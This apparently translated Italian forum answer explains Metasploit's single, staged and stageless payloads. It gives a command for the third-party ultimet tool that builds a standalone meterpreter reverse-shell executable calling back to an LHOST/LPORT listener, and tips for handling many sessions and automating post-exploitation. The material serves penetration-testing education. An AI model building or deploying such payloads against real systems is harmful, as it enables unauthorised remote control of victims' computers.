Metasploit ha più payload suddivisi in single, stager e stage. Il singolo carico utile è incapsulato in un unico file eseguibile e non richiede download aggiuntivi. Ad esempio, payload / windows / shell_reverse_tcp è un singolo payload che può essere utilizzato come eseguibile standalone.
Per impostazione predefinita, il payload meterpreter è un payload progressivo. Se lo si genera tramite msfconsole / msfpayload / msfvenom, viene generata la prima fase e, quando viene eseguita, scarica la seconda fase metsrv.dll dal gestore. Tuttavia, c'è un payload stand-alone meterpreter al di fuori dell'albero ufficiale Metasploit creato da Sherif Eldeeb. Puoi scaricarlo dal repository github di Sherif Eldeep .
Da github repositoty, scarica l'archivio ultimet.zip e genera l'eseguibile standalone come:
ultimet.exe -h <LHOST> -p <LPORT> -t "reverse_tcp" --msfpayload
-t è il trasporto che scegli. È possibile anche altri mezzi di trasporto come il reverse / binding http (s). Il comando precedente creerà un nuovo eseguibile nella directory avente un nome REVERSE_TCP__LPORT.exe. Questo è un eseguibile meterpreter standalone dove il secondo stage metsrv.dll è incapsulato nello stesso eseguibile. Tuttavia, si noti che il trasporto reverse_https ha attualmente un bug in cui la connessione si blocca ogni volta che ci si connette al gestore. reverse_tcp è molto affidabile.
Utilizza l'opzione false ExitOnSession nel msfconsole e puoi gestire tutte le sessioni che vuoi. Inoltre, ho notato che più connessioni possono essere gestite in modo più efficiente attraverso Armitage più facilmente, ma è solo una questione di preferenza. msfconsole è anche molto utile nella gestione di più connessioni in cui è possibile automatizzare molte attività di post sfruttamento mediante script di risorse.
Aggiornamento: come da richiesta pull 4925 , meterpreter stageless fa ora parte della distribuzione ufficiale di Metasploit. Questa non è integrazione del lavoro di Sharif, ma piuttosto una completa riscrittura da OJ Reeves.